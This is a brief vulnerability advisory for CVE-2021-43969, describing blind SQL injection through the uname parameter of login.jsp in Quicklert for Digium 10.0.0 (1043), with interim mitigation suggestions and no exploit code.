CVE-2021-43969

Name of the Vulnerable Software and Affected Versions Quicklert for Digium version 10.0.0 (1043)

Description The issue affects the login.jsp page, allowing for Blind SQL Injection with Out-of-Band Interaction (DNS) and Blind Time-Based SQL Injections. This can be exploited to disclose all data within the database, including administrative accounts' login IDs and passwords, via the uname parameter in the login.jsp page.

Recommendations For Quicklert for Digium version 10.0.0 (1043), consider restricting access to the login.jsp page until a fix is available. As a temporary workaround, avoid using the uname parameter in the login.jsp page to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.